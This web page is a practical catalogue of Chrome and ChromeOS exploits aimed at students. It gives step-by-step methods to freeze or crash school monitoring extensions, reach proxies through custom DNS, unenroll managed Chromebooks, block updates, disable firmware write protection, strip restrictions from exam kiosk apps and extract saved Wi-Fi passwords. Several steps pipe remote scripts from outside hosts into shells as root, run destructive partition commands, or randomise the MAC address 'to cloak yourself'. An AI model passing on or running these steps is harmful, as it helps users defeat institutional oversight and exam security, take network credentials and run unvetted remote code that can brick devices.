This page is for Google Chrome/Chrome OS bypasses
For Windows exploits, see Bypasser’s Windowskit
Most web-based exploits will work on other Chromium based browsers
proxy moment
Opens a proxy tab with about:blank cloaking.
Web-based exploit.
1: Make a bookmarklet with the link from xlak.github.io/alphabetic/ & run it.
2: Print the page (Ctrl+P), then cancel & click “try again”. A proxy tab will open.
1: Disable Wi-Fi.
2: Click "Sign in as Existing User".
3: Hold esc & click any app.
4: Click "Add Wi-Fi" & click any Wi-Fi.
5: Click "Diagnose" & go to Wi-Fi.
6: Click "Open in Settings", then close it.
7: Repeat step 2.
Requires Extension Dev Mode
Freezes extensions.
Web-based exploit.
1: Go to chrome://extensions & enable Extension Dev Mode.
2: Click on the background page of the extension you want to block, then "Network", "Disable Cache", & "No Throttling".
3: Go to Settings & click on the "Disable javascript" box. Keep this tab open.
4: Disable "No Throttling".
Requires access to DNS settings
Browse web from the sign-in screen.
Chrome OS-based exploit.
1: Sign out & click the settings button located at the top right of the Wi-Fi panel.
2: Set "Name servers" to "Custom name servers".
3: Set the first Custom name servers to 150.136.163.0.
You'll see a link on the normal sign-in screen that says "Visit this network's sign-in page".
4: Click on "Webview link for tests".
5: Click "Diagnose" & go to Wi-Fi.
Patched on Chrome OS 123+
Crashes extensions.
OS-based exploit.
1: Pin the extension you want to disable, sign out, disable Wi-Fi, & log back in.
2: Quickly enable Wi-Fi, open Chrome, & spam the pinned extension for ~30 seconds.
1: Get the code from here & paste it in a new tab.
2: Inspect the page that loads.
3: Click on “Console” at the top & paste the script in.
4: When an inspect window pops up, paste the script in again.
Requires powerwash.
Your extensions get corrupted & don't work.
Chrome OS-based exploit.
1: Powerwash your Chromebook.
2: Log into your Chromebook & immediately turn off Wi-Fi, then perform an instant restart (refresh+power).
3: Log back in & look for an option to log in as an existing user.
4: Go to chrome://extensions & turn on Wi-Fi.
5: Wait for your school’s blocking extension to appear. As soon as it does, turn off Wi-Fi & restart quickly.
6: Log back in, go back to extensions, & wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked.
Memory leak unavoidable; patched on Chrome OS 135+
Disables extension with a memory leak.
Web-based exploit.
1: Go to chrome://extensions.
2: In a new tab, go to the settings page of the extension you want to disable.
3: In another tab, go here & click the “freeze extension button”.
4: Immediately switch back to chrome://extensions & spam the “allow access to file URLs” for a few seconds.
5: The extension is now disabled. You need to flip the switch a few times every couple of minutes, & you may need to reopen the Dextensify page every once in a while to prevent an unavoidable memory leak from crashing the system.
Patched on Chrome OS 135+
Allows toggling of forced extensions by printing iframes. Based off LTMEAT Print method.
Web-based exploit.
ExtPrint3r.mp4
1: Open this link.
2: Look for your blocker on the list. If it isn't there, toggle "show all extensions" in the settings.
3: Click disable & follow the directions on the popup window. You'll need to do it very quickly.
If the extension switches back on, increase the iframe slider in the settings.
Requires tab limit.
Crashes the admin's ability to remove tabs, though they can still see your screen.
Web-based exploit.
1: Create a bookmarklet with this code.
2: Spam click the bookmarklet while holding Ctrl.
3: If you’re asked to close the page, click no & prevent the page from making additional dialogues.
Patched on Chrome OS 129+
har har har har har har
Created by crossjbly.
Web-based exploit.
1: Download this file.
2: Go here.
3: Once it loads, add "?experiments=true" to the end of the URL.
4: On the inspector page's sidebar, click the 2 arrows & select "Network".
5: Upload the har har file.
6: Double click the text that appears in the box.
Requires chrome://net-internals access.
Bypasses extensions that also use a Chrome app. Hapara & iBoss are known to work.
Web-based exploit.
1: Go to chrome://net-internals & click the "Domain Security Policy" tab.
2: Insert 127.0.0.1 in the "Add HSTS domain’s Domain" textbox, then click "Add".
3: Repeat step 2, but use "localhost" instead of 127.0.0.1.
4: Restart your computer.
Patched on Chrome OS 82+
Allows you to enter Incognito mode.
Web-based exploit.
1: Enter your username & password, but don't sign in.
2: Press Alt+Shift+I & spam the "Privacy Policy" for ~30-60 seconds.
3: Login, quickly go to the Incognito tab, then press Ctrl+Shift+N.
4: Close the original Incognito tab.
5: If it continues to open policy pages, repeat Step 4.
127OSBlocksi;GoGuardian;Hapara;iBoss;Securelychrome://flagsIncognito 123-127
Patched on Chrome OS 127+
Allows you to enter Incognito mode.
Web-based exploit.
1: Enable the chrome://flags/#captive-portal-popup-window flag (v123-125)/chrome://flags/#temporary-unexpire-flags-m124 (v126)/chrome://flags/#temporary-unexpire-flags-m125 (v126-127) flag & restart. If the flag didn't reset, continue.
2: In Wi-Fi Settings, set Name Servers to Custom Name Servers & the first box to detectportal.firefox.com/captive.apple.com/150.136.163.0 (any one of these).
3: Click sign-in on the popup, then press Ctrl+T.
4: Revert the change to Name Servers.
Doesn’t work with Hapara Highlights & Read&Write; patched on Chrome OS 111+
Uses locked mode to disable extensions. Formerly called Locked Mode Hack.
Web-based exploit.
Methods using (B) & (C) are patched on Chrome OS 115+ while the rest are patched on Chrome OS 135+
Crashes an extension's manifest file.
Web-based exploit.
Note: LTMEAT disables all extensions, not just your blocker.
Template URL: chrome-extension://ID/manifest.json
Extension IDs (Chrome):
Blocksi: pgmjaihnmedpcdkjcgigocogcbffgkbn
ContentKeeper: jdogphakondfdmcanpapfahkdomaicfa
Cisco Umbrella: jcdhmojfecjfmbdpchihbeilohgnbdci
Fortiguard: igbgpehnbmhgdgjbhkkpedommgmfbeao
GoGuardian: haldlgldplgnggkjaafhelgiaglafanh
Hapara: kbohafcopfpigkjdimdcdgenlhkmhbnc
iBoss: kmffehbidlalibfeklaefnckpidbodff
LANSchool: baleiojnjpgeojohhhfbichcodgljmnj
Linewize: ddfbkhpmcdbciejenfcolaaiebnjcbfc
NetRef: khfdeghnhlpdfeenmdofgcbilkngngcp
Securly: joflmkccibkooplaeoinecjbmdebglab
Smoothwall: jbldkhfglmgeihlcaeliadhipokhocnm
If your blocker ID isn’t on this list, go to the extension page & copy the character string in the URL.
LTMEAT.mp4
1: Take the Template URL & replace "ID" with the extension ID. This is the extension's manifest page.
2: Go to the extension’s manifest page & bookmark it (A), as well as chrome://kill (B) & chrome://hang (C).
3: While on (A), click on (B).
4: Instantly start spamming (C) & reload.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelySwitch Method
1: While on (A), click on (B).
2: Duplicate the tab.
3: Go to the extension’s settings page.
4: Flip the "Allow access to file URLs" switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyChat Method
1: Wait until your teacher opens the chat window.
2: Spam X until it stops opening.
3: Flip the “Allow access to file URLs” switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyTemporary Method
1: Create a new bookmark folder (spam.js) & inside that folder, make 38 bookmarks of the page chrome-extension://id/background.js (you can do this easily with the bookmark manager).
2: Go to chrome://settings/performance & turn memory saver off. Under “Keep these sites always active”, add chrome-extension://id/background.js.
3: On a new tab, right click (spam.js) & click “open all (38)”. Repeat this step, then duplicate the rightmost page & go to your blocker’s extension page..
4: Flip the “Allow access to file URLs” switch & go to the leftmost tab. Right click it & select “Close tabs to the right”. Keep the remaining background.js tab open.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelySkid Method
1: Go to (A) & click on (C).
2: Duplicate the tab (right click on it & click “duplicate”).
3: Go to your blocker’s extension page & flip the “Allow access to file URLs” switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyWeb Method
1: Go here & follow the instructions there.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyWi-Fi Method
1: Go to your blocker's extension page.
2: Disable Wi-Fi.
3: Spam the “Allow access to file URLs” switch.
4: Enable Wi-Fi.
5: Spam pin your extension.
Requires bookmarklets; patched on Chrome OS 115+
Loads pages without extensions.
Web-based exploit.
1: Create a bookmarklet by dragging the box that says “Quickview Launcher” from here into the Bookmarks Bar.
2: On that same page, double click the opener.
3: On the newly opened tab, run the bookmarklet.
Patched on Chrome OS 129+
Allows you to do a ton of things (with the right permissions).
Web-based exploit.
Rigtools.mp4
1: Keep this website open in a new tab.
2: Open this website & go to Network.
3: Double-click the black/grey box.
4: Click "extension-ID" & find your the extension ID of the extension you want to disable, then paste it in. It should load a filesystem: page. You can have other extensions under it.
5: Run this code. Note it won't work if your extension's manifest file doesn't have the proper permissions.
Requires an extension with a textbox
Hangs extensions.
Web-based exploit.
1: Download the index.html & emoji files.
2: Insert the emoji file into the HTML file.
3: Click "Copy to Clipboard".
4: In a textbox from the extension you want to disable, do paste & after a second, do it again.
5: Immediately after, open a page related to the extension (such as the manifest file) & keep it open.
Requires a kiosk app; Most methods patched on version 119
Opens a window inside of a kiosk app, which has different permissions & extensions.
Chrome OS-based exploit.
Skiovox.mp4
1: In the login screen, turn off your Wi-Fi.
2: If you have a password, type it in but don’t press enter.
3: Click on a kiosk app & press Alt+Shift+S instantly.
4: Wait until you get a “network unavailable screen”.
5: On the toolbar, click accessibility & then the ?.
If you see a “back” button proceed to method A (steps A-B), otherwise go to method B (steps C-E) or method C (steps F-H).
Method A:
A: Click “add other Wi-Fi network” & immediately press Esc twice & Enter. If you get a screen saying “multi sign-in is disab;ed”, press Esc to bypass it.
B: There may be an open window belonging to your school profile, you can close it. In the window behind it that has no extensions, click the 3 dots & then click “new window”. Use this window instead. Go to steps 14+.
Method B:
C: Press the “diagnose” button.
D: Just click “add other Wi-Fi network”. This is inconsistent, try a few times with a few apps or use steps 11-13.
E: Click Wi-Fi, then the settings link. Close this window to reveal a Chrome window. Go to steps 14+.
Method C:
F: Just click “add other Wi-Fi network”.
G: Turn on text-to-speech (Ctrl+Alt+Z). Hold the Search key & press O, then T.
H: Click “resources” & one of the 3 links to open Chrome. Once your browser is open, you can turn text to speech off. Go to steps 14+.
This exploit has some problems that can be fixed by the Skiovox Helper. A ZIP file of the extension is available on the GitHub page as well as here.
6: Go to chrome://extensions & enable extension Dev Mode. Click “load unpacked” & in the select a file menu, right click the ZIP file you downloaded earlier, & click “extract all”. Select the newly extracted folder to install the extension.
Other notes:
Problems without Skiovox Helper:
-Unclear how to add an account/install extensions.
-Keyboard shortcuts are broken.
-It’s hard to remove or resize windows.
-Can’t view battery percentage or time.
The main difference between the results of method A (steps A-B) than method B (steps C-E) or method C (steps F-H) is method A can open multiple windows, while the others can’t.
If your screen keeps falling asleep every 5 seconds, try a different kiosk app.
Your files, bookmarks, & history won’t transfer over to the exploit & vice versa.
To exit the exploit, either hold down your power button & sign out or type chrome://quit in a new tab.
OSBlocksi;GoGuardian;Hapara;iBoss;SecurelyKiosk125/126 Method
1: Do the main methods steps 1-4.
2: Click the cog in the brightness settings instead.
3: Click on one of the links in Chromevox's Resources tab (Ctrl+Alt+Z), then disable it.
4: Click "Sign in as existing user" & login. If you don't see this, try a different kiosk app.
5: Press Esc on the "Multi user sign in disabled on this Chromebook" screen.
6: Turn on Wi-Fi & open a new window.
7: Go to main method steps 6+.
Note that any Incognito window is still monitored by your school.
Requires extension access.
Uses OneTab & European witch magic to unblock websites.
Web-based exploit.
1: Download the OneTab extension.
2: Click the "import" button in the extension's settings tab.
3: Add the URL you wish to visit ~100 times, then click "import".
4: Spam click the top link, then either spam Esc on one of the opened tabs or wait for one to load on an about:blank page.
Requires Name Servers.
I don't know man but it gets you an unblocked browser.
OS-based exploit.
1: Sign out & go to the Wi-Fi Settings.
2: Go to Name Servers & set it to "Custom Name Servers", then set at least 1 box to "52.207.185.90". If itdoesn't automatically save, reconnect 1-3 times.
3: If you see a "Network not available" page, click "Sign in as an existing user" & then back until you reach the login screen.
4: Underneath there should be a "Sign in with Google account" button. Click it & then "Forgot Email?".
5: It should now show a 400 error page, click the Google logo.
Requires access to DNS settings
Connects you to a proxy server.
Chrome OS-based exploit.
1: Open the DNS settings.
2: Select "custom name servers" & set all of the boxes to 0.0.0.0.
3: Wait 5 seconds, then change them to 150.136.6.90.
4: In Google, go here.
5: Reload the page (Ctrl+Shift+R), then go here on the same tab.
6: Click on the big red triangle in the middle of the page & type "thisisunsafe". If you fail, reload the page & repeat this step.
7: Repeat step one & select "automatic name servers".
Patched on Chrome OS v132+
Shimboot via BadApple.
Chrome OS-based exploit.
1: Enter Recovery Mode (Esc+Power+Refresh), then Dev Mode (Ctrl+D), then Recovery Mode again, & finally miniOS (Internet Recovery).
External storage device method:
2: Flash an Appleboot shim on an external storage device & when miniOS loads plug it in.
3: Open the VT3 shell (Ctrl+Alt+F3) & find the external storage device identifier with "fdisk -l".
4: Once you've found it, run the payload with "mount /dev/sdX1 /usb && /usb/main.sh".
5: Select a disk & you'll boot into Linux.
Wireless method:
2: Click "Next", then on the "Connect to a network to begin recovery" connect to a network.
3: Once you see a "Start recovery" page, open the VT3 shell (Ctrl+Alt+F3).
4: Run "cd / && curl -LOk appleboot.appleflyer.xyz/usbless.sh && sh usbless.sh" to start the bootloader.
5: If this is your first time performing the exploit, install an Appleboot ROOTFS onto the stateful partition or an external storage device (not /dev/mmcblk0).
6: Select a disk & you'll boot into Linux.
Requires miniOS; patched on Chrome OS 132+
Chrome OS-based exploit.
BadApple.mp4
1: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
2: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
3: When connected, press Ctrl+Alt+F3.
Requires a storage device, another PC; patched on Chrome OS 125+ & kernver 4+ & keyrolled devices
Chrome OS-based exploit.
BadRecovery.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the kernver text ends in 4+, your Chromebook is unsupported.
3: Download a bin from cros.download.
4: Go here & upload it, then flash it.
5: Enter Recovery Mode (Esc+Refresh+Power).
6: Insert the external storage device & follow its instructions.
Requires a storage device, another PC; only works on Chrome OS v135-7 (due to sh1ttyOOBE)
Works on keyrolled devices.
Created by crossjbly.
Chrome OS-based exploit.
BadSH1MMER.mp4
1: Complete sh1ttyOOBE.
2: Make a BadSH1MMER image, then flash it.
3: Enter Recovery Mode (Esc+Refresh+Power).
4: Boot the external storage device & run any payloads you want, such as the BadBr0ker payload.
about:blank
Allows you to run bookmarklets on privileged pages.
Web-based exploit.
Blank3r.mp4
1: Make a bookmarklet with this code.
2: Go to chrome://extensions & click on an extension.
3: Click “view in Chrome Web Store” & spam escape. If it loads into a blank screen, run the bookmarklet.
4: Keep this tab open.
AnyWebBlobe BM
Not compatable with every bookmarklet by design
Runs bookmarklets.
Web-based exploit.
1: Go to chrome://network#state.
2: Find the managed Wi-Fi under "Favorite Networks".
3: Click the "+" & copy all the text.
4: Go here & paste the test into the bar, then click "Download".
5: Go to chrome://network#general & import the ONC file.
Requires external storage device; patched on Chrome OS v133+
Unenrollment exploit.
If you're keyrolled, you can use the BadBr0ker payload in BadSH1MMER.
Chrome OS-based exploit.
Br0ker.mp4
1: Downgrade to v132 (or lower). You can skip this step if you build a SH1MMER shim yourself, as it includes a downgrading payload.
2: Flash a SH1MMER image with an updated payload & run it. If you're keyrolled, you can use BadSH1MMER instead.
3: Run the (Bad)Br0ker payload, then press Y to continue.
4: Once it restarts. wait until the "Get Started" button appears, then enter Dev Mode again.
5: Follow the instructions below based on your current version. You do not have to follow these if you're using BadBr0ker.
v110 & lower
A: Run this command in any root shell, then powerwash:
vpd -i RW_VPD -s check_enrollment=0v111-124
A: Run these commands in either VT2 shell or Ctrl+U booted shim, then powerwash:
vpd -i RW_VPD -s check_enrollment=0 tpm_manager_client take_ownership cryptohome --action=remove_firmware_management_parametersv125-135
A: Powerwash, open VT2 shell, run these commands exactly (> included), then exit & set up the device (without rebooting until finished):
echo --enterprise-enable-unified-state-determination=never >/tmp/chrome_dev.conf echo --enterprise-enable-forced-re-enrollment=never >>/tmp/chrome_dev.conf echo --enterprise-enable-initial-enrollment=never >>/tmp/chrome_dev.conf mount --bind /tmp/chrome_dev.conf /etc/chrome_dev.conf initctl restart uiv136+
A: Powerwash, open VT2 shell, run these commands exactly (> included), then exit & set up the device (without rebooting until finished):
echo --enterprise-enable-state-determination=never >/tmp/chrome_dev.conf' mount --bind /tmp/chrome_dev.conf /etc/chrome_dev.conf initctl restart ui
6: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Certain boards are incompatible (see here); patched on Chrome OS 132+ & keyrolled devices
Unenrolls your Chromebook.
OS-based exploit.
BR1CK.mp4
1: Powerwash (Esc+Power+Refresh then Ctrl+D) & return to Secure Mode.
2: Go to chrome://network#logs & check all boxes under the options section.
3: Place the combined-logs.tar.gz file in here. If you don't have access, the time will be ~1-1.5 seconds less than the time it takes to enroll.
4: Sign out & powerwash again, but use Ctrl+Alt+Shift+R instead.
5: When the "Enterprise Enrollment" screen appears, wait untul you're in the higher time range & perform an EC-Reset (Power+Refresh).
6: If you get a screen prompting you for recovery ("Chrome OS is missing or damaged" or "Something went wrong"), continue.
7: Preform SH1MMER (Legacy).
A: While you're here, disable the 5 minute Dev Mode wait.
8: Select Deprovision (D), then type "B" to open a bash shell.
9: Run this command: "gsctool -a -o" & press the power button when it spams "Press PP button now!".
10: Reenter Dev Mode, then when the "Enterprise Enrollment" screen shows up again enter Recovery Mode & boot into SH1MMER.
11: Run deprovision (D) & then reboot (E).
12: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Has to be done for each Wi-Fi network; patched on Chrome OS 128+
Prevents your Chromebook from automatically updating.
Web-based exploit.
CAUB.mp4
1: Go to chrome://network#state & scroll to the bottom.
2: Click the "+" by the name of the Wi-Fi network.
3: Copy the whole page (Ctrl+A then Ctrl+C).
4: Go to caub.glitch.me & paste it into the text box.
5: Click "generate onc" & download the file.
6: Go to chrome://network#general & import the onc file.
127Webchrome://networkFlag Method
Requires chrome://flags access; patched on Chrome OS 128+
Chrome OS-based exploit.
1: Go to chrome://flags#show-metered-toggle & enable it.
2: Open Settings & go to Network >> Your Wi-Fi >> Advanced >> Show metered toggle & turn it on.
Requires Crosh, Dev Mode
Dump any kiosk app & then make it a regular Chrome OS app.
Chrome OS-based exploit.
ChrioskDumping.mp4
1: Enable Dev Mode, then add your home & then your school account.
2: Open Crosh (Crtl+Alt+T) & run "shell", then go to "/home/chronos/{user account hash}/extentions/kiosk/" & find the ID of the kiosk app you want to dump.
TestNav: mdmkkicfmmkgmpkmkdikhlbggogpicma
SecureTestBrowser: hblfbmjdaalalhifaajnnodlkiloengc
NWEA: omkghcboodpimaoimdkmigofhjcpmpeb
CollegeBoard: joaneffahikmmipmidpkeedopejmhbbm
3: Back it up to your downloads folder by running "cp /home/chronos/{user account hash}/extentions/kiosk/(app ID) /home/chronos/{user account ID hash}/Downloads/".
4: Go into the folder & edit the "manifest.json" file. Delete the "kiosk_only" : true" line.
5: Load the folder with Extension Dev Mode in chrome://extensions (click "Load Unpacked").
d
Prevents your Chromebook from automatically updating by deleting the update partitions. Version of DAUB that allows for updating Chrome OS manually.
Works while enrolled.
OS-based exploit.
CKAUB.mp4
1: Access a shell (via methods such as SH1MMER or BadApple).
2: Mount a storage device with CKAUB.sh & run that payload.
Updating:
1: Run the payload, then run "dd if=/dev/sdX4 of=/dev/mmcblk0p2 bs=1M oflag=direct status=progress" & "dd if=/dev/sdX3 of=/dev/mmcblk0p3 bs=1M oflag=direct status=progress", where X is your external storage device's drive letter. You can run "lsblk" in the dialog where it asks you to enter the command.
2: When it asks you to flash a recovery image, flash one that's +1 kernver higher than your current.
Requires a storage device, another PC; patched on kernver 3+ & keyrolled devices
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.
Cryptosmite.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the kernver text in 3+, your Chromebook is unsupported.
3: Download a SH1MMER injected RMA shim from here or build your own (wether via Wax4Web or a command line).
4: Flash the injected RMA Shim onto a USB device.
5: Enter Recovery Mode (Esc+Refresh+Power) then Dev Mode (Ctrl+D).
6: Reenter Recovery Mode & plug in your external storage device.
7: Play some Tetris. This is legally required.
8: Use the Cryptosmite payload, this is "S" on Legacy. The decryption key is "Info-58-immense!NickName_Arabia-710" on older Legacy shims.
9: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Might not work
Prevents your Chromebook from automatically updating by deleting the update partitions. Also blocks kernver updates.
Just use CKAUB instead.
OS-based exploit.
DAUB.mp4
1: Access a shell (via methods such as SH1MMER or BadApple).
2: Run the following (3rd will open a prompt):
cgpt add /dev/mmcblk0 -i 2 -P 10 -T 5 -S 1 yes | mkfs.ext4 /dev/mmcblk0p1 fdisk /dev/mmcblk0 d 4
{just press enter}
d 5
{just press enter}
w
Requires a storage device; mostly limited
Downgrade your Chromebook.
Chrome OS-based exploit.
Downgration.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner & check what the kernver text ends in.
3: Go to chrome://version & check your board (after platform).
4: Go to cros.download & find your board.
5: Download the version of Chrome OS you want. Note the images come with kernver updates, & some versions have multiple variations with different kernver updates bundled in.
6: Flash the image.
7: On your Chromebook, enter Recovery Mode (Esc+Power+Refresh) & plug in your external storage device.
8: Skip the "Checking for Updates" screen by waiting, or on older version pressing Ctrl+Shift+E.
Requires a storage device; patched on Chrome OS 130+ & keyrolled devices
Boots into an unenrolled Chrome OS environment.
Chrome OS-based exploit.
E-Halcyon.mp4
1: Download a Chrome OS 107 bin from chrome100.dev & inject it yourself or download one from here.
A: Open a terminal & run "git clone https://github.com/MercuryWorkshop/RecoMod", "cd RecoMod", "chmod +x recomod.sh", & "sudo ./recomod.sh -i /path/to/recovery/image.bin --halcyon --rw_legacy".
2: Flash it onto a storage device.
3: Enter Recovery Mode (Esc+Refresh+Power) & plug in the storage device.
4: Spam E until you get a 5 minute wait sequence, then spam E again near the end of it.
5: Navigate to "Activate halycon enviroment" & press enter, then navigate to "Install halycon semi-tethered". Navigate back to "Activate halycon envirement" & select "Boot halycon semi-tethered".
6: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
You can no longer boot Chrome OS normally, & will have to use the external storage device every time.
Doesn’t work with blocklist/banlist
Installs an extension without using the webstore.
Web-based exploit.
ExtensionLauncher.mp4
1: Make a bookmarklet with the code from here.
2: Go here & run the bookmarklet.
3: Find an extension you want to download.
4: Right-click the image to the left of the title & select "Copy image address". Paste the image address into the first bar.
5: Type the name of the extension into the second bar.
6: Copy the extension ID (string of random letters in the address bar). Paste it into the third bar.
7: Click "Download".
Visit the Extension Information page for information on some extensions.
AnyHardwareFirmware Write Protection
Disabling FWWP allows you to do many things, including flashing custom firmware (allowing for installation of Linux, Windows, etc.) & setting GBB flags.
The method to disable FWWP depends on your Chromebook, however if you're on v114+ you must use the Pencil method while enrolled. History of FWWP:
PreCr50: these old boards used either a screw, a jumper, or a switch on the motherboard & are some of the simplest out there. If you happen to be lucky enough, I recommend trying this.
Cr50: following this, a new chip was added known as the Cr50. Cr50 Chromebooks set FWWP to the battery sense line prior to v115, while nowadays we require everybody's favorite Pencil method. You can also use Closed Case Debugging/SuzyQable on all of these, as long as you're unenrolled.
Ti50: the generation 2 Cr50 chip, better known as the Ti50, now verifies the RO portion of the fimware at boot, meaning you need to run a few commands to prevent bricking. Regardless of wether a Ti50 device supports another method, you must use CCD/SuztQable (unenrolled), Ti50 FWWP Reoval (VT2), or Pencil Sharpener (patched on v136).
AnyHardwareScrewdriverScrew; doesn't work with FWMP on v114+
Requires screwdriver
1: Turn your Chromebook off & unscrew the back cover.
2: Locate & use unscrew on the WP screw.
3: Screw the back cover back on.
113HardwareScrewdriverJumper
Requires screwdriver, bridger; doesn't work with FWMP on v114+
1: Turn your Chromebook off & unscrew the back cover.
2: Disconnect the internal battery cover.
3: Locate & bridge the area with for the WP jumper.
4: Reassemble the device.
AnyHardwareScrewdriverBattery
Requires screwdriver; doesn't work with FWMP on v114+
1: Turn your Chromebook off & unscrew the back cover.
2: Unplug the power cord connecting the battery & motherboard.
3: Run the nessesary commands. If you're on v136+ change the device secret.
Save device secret: vpd -i RO_VPD -l
Change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=device_secret
4: Plug the power cord back in & screw the back cover on (or just leave it off you fucking psycho).
AnyHardwareScrewdriverPencil
1: oh fuck no not yet
save device secret: vpd -i RO_VPD -l change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=$(openssl rand -hex 32) AnyHardwareDev Mode; Debug Cable/Ti50CCD
Requires Dev Mode; doesn't work with active FWMP; debug cable required on nonTi50
1: Enter Dev Mode, then open the VT2 Shell (Ctrl+Alt+F2 on login screen).
2: Login as root & run "gsctool -a -o".
3: Unless you removed the battery beforehand, you will be prompted to press the physical presense (PP) button multiple times, on most devices this is the power button.
4: When you see "Another press will be required!", do not press the button & wait until the text changes again.
5: Upon completion, you will see the message "PP Done!" confirming CCD enabling. Return to Dev Mode & the VT2 shell.
6: Login as root again, & if on a Cr50 device plug in the debug cable & run "ls /dev/ttyUSB*"; this should return with ttyUSB0, ttyUSB1, & ttyUSB2 if the cable is correctly connected.
7: Run "gsctool -a -I AllowUnverifiedRo:always", then press the PP.
8: Run "gsctool -a -w disable", then press the PP again, & run "flashrom --wp-disable".
Unbricking Ti50s: hold the power button, on Chromebooks press F2 twice or on Chromeboxes press the recovery pinhole instead, then release the power button & repeat.
GBB flags
Requires disabled FWWP
These allow you to edit certain things, such as the Dev Mode wait timer, disable FWMP (unenroll), force enable certain things such as USB booting, & more.
1: Go to the GBB Flaginator to easily set select flags to set.
2: Run "futility gbb -s --flash --flags=0x120b7" on newer devices & "/usr/share/vboot/bin/set_gbb_flags.sh 0x120b7" on older ones to set flags. You can read them with "futility gbb -g --flash --flags"/"/usr/share/vboot/bin/get_gbb_flags.sh" respectively.
Requires Dev Mode, FWWP disabled
Dekeyrolls your device. Not the same as firmware 2, the updated version of Chromebook firmware included in v114+
Chrome OS-based exploit.
1: Enter the VT2 shell (Ctrl+Alt+F2), then sign in as chronos & run "curl -LO https://raw.githubusercontent.com/Cruzy22k/Firmware2/main/firmware.sh && sudo bash firmware.sh".
125-129OS;UnenrollmentExternalPC;ExternalStorageDevice;Powerwash;RecoveryModeIcarus Lite
Requires a storage device, another PC; requires Chrome OS 125-129
Unenrolls devices with device management interception using a proxy & a custom Certificate Authority.
Both devices should be on the same Wi-Fi network.
DO NOT USE PUBLIC ICARUS PROXIES.
Chrome OS-based exploit.
IcarusLite.mp4
1: On an external PC, clone the repo with "git clone --recursive https://github.com/cosmicdevv/Icarus-Lite.git" & change directory to it (cd Icarus-Lite).
2: Set up the environment. You can either run the following commands or the exe.
Nonkeyrolled
A: Check your Chromebook's board in chrome://version, then download a prebuilt SH1MMER bin (with the Icarus payload) here.
B: Flash it to an external storage device, enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked), then boot the shim.
Keyrolled
A: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
B: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
C: When connected, press Ctrl+Alt+F3 & run "bash <(curl -SLk http://ba.cosmion.xyz/script)".
3: Reboot into Verified Mode & do not click continue. Open up the Network Configuration instead (bottom right corner).
4: Set the connection type to "Manual" & the "Secure HTTP" options to those given earlier, then click "Save" & continue the setup process.
5: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Only works on unenrolled Chromebooks; requires a storage device
Switches your kernver.
Chrome OS-based exploit.
KVS.mp4
1: Unenroll your Chromebook.
3: Download a KVS bin from here.
4: Flash it onto a storage device.
5: Enter Dev Mode.
6: Reenter Recovery Mode.
7: Follow the instructions on-screen.
Very buggy
Bypasses Google's Locked Mode.
Web-based exploit.
1: Open the locked form twice.
2: Click "Continue" on both at the exact same time. Using a touchscreen will help a lot.
3: Click the Overview button (not Alt+Tab, that closes the quiz) on your keyboard.
Note you can't screenshot until the form has been submitted.
Requires Dev Mode
Spoofs Secure Mode with Dev Mode privileges. Continuation of Fakemurk.
OS-based exploit.
1: Enter Dev Mode (Esc+Power+Refresh; Ctrl+D) & the VT2 shell (Ctrl+Alt+F2).
2: Logn as root & run "bash <(curl -SLk https://bit.ly/murkmod)".
3: Install the helper extension (unzip the "helper" folder & load unpacked).
Only works with connected networks; Chrome OS exclusive
Gives the passwords to connected Wi-Fi networks from a .json file.
Web-based exploit.
PPT.mp4
1: Go to chrome://net-export.
2: Select "Include raw bytes" & start logging to disk.
3: Go to chrome://policy.
4: Click "Reload policies".
5: Go back to chrome://net-export & stop logging.
6: Go here or open this HTML file & upload the log file.
Requires a storage device; patched on v112+
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.
SH1MMER.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the kernver text ends in 2 or more, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at Wax4Web, download an injected bin from here, or build one yourself.
Modern shims have a UI, while Legacy uses a commandline interface.
5: Flash the injected bin onto an external storage device.
6: Enter Recovery Mode (Esc+Refresh+Power), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: On Legacy shims, play some Tetris. This is legally required.
9: Run "Deprovison Device".
10: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Reenrollment
1: Enter Dev Mode, then press Esc+Power+Reload then Ctrl+D & then enter.
2: If you get a screen that says "You're already in Dev Mode", skip it by pressing Ctrl+D again.
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R). If you just entered Dev Mode, you can skip this step.
4: Once you enter the Wi-Fi password, click the "Enterprise Enrollment" button & sign in with your school account.
5: Once you're on the normal district login screen, press Ctrl+Alt+F2.
6: Type "root" as the login & "test0000" as the password if needed.
7: Run the command "vpd -i RW_VPD -s check_enrollment=0", then press Ctrl+Alt+F1.
8: Once you're done, reboot your computer with Power+Refresh, then reunenroll.
